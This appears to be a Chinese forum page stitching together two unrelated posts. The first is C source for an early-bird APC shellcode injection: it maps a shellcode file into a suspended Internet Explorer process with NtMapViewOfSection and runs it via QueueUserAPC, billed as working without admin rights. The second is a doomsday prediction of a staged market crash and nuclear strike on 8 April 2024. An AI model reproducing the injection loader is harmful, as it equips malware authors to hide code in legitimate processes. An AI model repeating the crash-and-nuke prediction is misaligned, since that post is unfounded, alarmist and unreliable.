Ring3 NtMapViewOfSection注入DLL源码

aiai101

新的注入方式:利用一个未公开函数NtMapViewOfSection在远程进程地址空间写入代码，并且用一种新的技术在远程进程中执行它，这种技术完全工作在用户模式下，并且不需要特殊的条件比如像管理员权限或者之类的要求

1. #define _WIN32_WINNT 0x0400
   
2. #include <windows.h>
   
3. 
   
4. typedef LONG NTSTATUS, *PNTSTATUS;
   
5. #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
   
6. 
   
7. typedef enum _SECTION_INHERIT
   
8. {
   
9. ViewShare = 1,
   
10. ViewUnmap = 2
    
11. } SECTION_INHERIT;
    
12. 
    
13. typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONG, ULONG );
    
14. 
    
15. func_NtMapViewOfSection NtMapViewOfSection = NULL;
    
16. 
    
17. 
    
18. LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow,
    
19. DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )  
    
20. {
    
21. NTSTATUS Status;
    
22. LARGE_INTEGER SectionOffset;
    
23. ULONG ViewSize;
    
24. ULONG Protect;
    
25. LPVOID ViewBase;
    
26. 
    
27. 
    
28. // 转换偏移量
    
29. SectionOffset.LowPart = dwFileOffsetLow;
    
30. SectionOffset.HighPart = dwFileOffsetHigh;
    
31. 
    
32. // 保存大小和起始地址
    
33. ViewBase = lpBaseAddress;
    
34. ViewSize = dwNumberOfBytesToMap;
    
35. 
    
36. // 转换标志为NT保护属性
    
37. if (dwDesiredAccess & FILE_MAP_WRITE)
    
38. {
    
39. Protect = PAGE_READWRITE;
    
40. }
    
41. else if (dwDesiredAccess & FILE_MAP_READ)
    
42. {
    
43. Protect = PAGE_READONLY;
    
44. }
    
45. else if (dwDesiredAccess & FILE_MAP_COPY)
    
46. {
    
47. Protect = PAGE_WRITECOPY;
    
48. }
    
49. else
    
50. {
    
51. Protect = PAGE_NOACCESS;
    
52. }
    
53. 
    
54. //映射区段
    
55. Status = NtMapViewOfSection(hFileMappingObject,
    
56. hProcess,
    
57. &ViewBase,
    
58. 0,
    
59. 0,
    
60.             &SectionOffset,
    
61. &ViewSize,
    
62.             ViewShare,
    
63.             0,
    
64. Protect);
    
65. if (!NT_SUCCESS(Status))
    
66. {
    
67. // 失败
    
68. return NULL;
    
69. }
    
70. 
    
71. //返回起始地址
    
72.    return ViewBase;
    
73. }
    
74. 
    
75. int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
    
76. {
    
77. HMODULE hDll = LoadLibrary( "ntdll.dll" );
    
78. 
    
79. NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");
    
80. 
    
81. // 取ShellCode,任何你想实现的
    
82. HANDLE hFile = CreateFile ("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    
83. 
    
84. HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);
    
85. 
    
86. // 启动目标进程
    
87. STARTUPINFO st;
    
88. ZeroMemory (&st, sizeof(st));
    
89. st.cb = sizeof (STARTUPINFO);
    
90. 
    
91. PROCESS_INFORMATION pi;
    
92. ZeroMemory (&pi, sizeof(pi));
    
93. 
    
94. CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);
    
95. 
    
96. 
    
97. // 注入shellcode到目标进程地址空间
    
98. LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);
    
99. 
    
100. // 创建一个新的能够在目标线程恢复是首先执行的APC
     
101. QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
     
102. ResumeThread (pi.hThread);
     
103. CloseHandle (hFile);
     
104. CloseHandle (hMappedFile);
     
105. CloseHandle (pi.hThread);
     
106. CloseHandle (pi.hProcess);
     
107. return 0;
     
108. }

复制代码

aaa0407

{2024年04月06日}地球崩盘的事件借口是什么？



作者：劳山倒
时间：2024年04月06日 18:43:23    星期六   农历二月廿八
上证综指 3069.30点    恒指 16723.92点    道指 3⑧904.04点



01
即将的，人类最大股市、金融市场大崩盘，18级金融大地震闪击战，
地球崩盘，需要一个事件借口，这个借口，可能是引爆核弹：

一 ，俄乌战争，普京的报复反击，很可能使用核弹；
二，巴以战争，伊朗的报复反击，很可能使用核弹；
三，即便，没有使用核弹，也是，核弹级别的剧烈冲突，足以，让全
人类，吓得尿裤子。
四，战争爆发的时间，很可能是04月08日，2024年的四月八日。
我判断，2024年04月，就是谜底、骗局揭开的时间。

《纽约地区罕见发生4.8级地震！当时联合国安理会正在开会》
cctv国际时讯   2024年04月05日 23:35:48
…… …… 地震发生时，纽约联合国总部正在就巴以问题举行安理会
会议，镜头记录下了地震发生时的情形。
据悉，美国东北部地区的地震比较少见。（央视记者 徐德智 赵淼）
[责任编辑：杨东明 PN301]

《带头闹事的全部绝育！泰国上千只猴子打群架，冲突为何这么严重？》
优美生态环境保卫者   2024-04-05 10:12    吉林
近期，泰国华富里府出现了近千只猴子打群架的罕见现象，引起了广泛关
注。这起事件，不但是猴群打架的数量非常庞大，泰国方面对后续处理的
方式也可谓异常坚决，让我们先来看看这起事件的情况。……


02
人类最大假摔黄金坑，暗黑帝国总冲顶之前的总洗盘；虚惊一场。
哪有什么突发意外谁都没想到？？
一切，都是蓄谋已久的精心策划。精心策划的，陷阱。
狼，总要吃羊，无论有没有那条小溪。
一枚小型原子弹的成本大约500万人民币左右，暗黑帝国要剪羊毛了，
1929年以来，92年大牛市的，总剪羊毛。

乌鸫，又叫百舌鸟，是瑞典的国鸟，它的叫声被当做对灾难的预警。
在古希腊传说中，乌鸫象征着珀尔塞福涅{冥后}。


03
附录四篇本人文章，你可以在网上搜一搜：

{2024年3月28日}关注，2024年04月08日。

{2024年3月18日 06:53:38}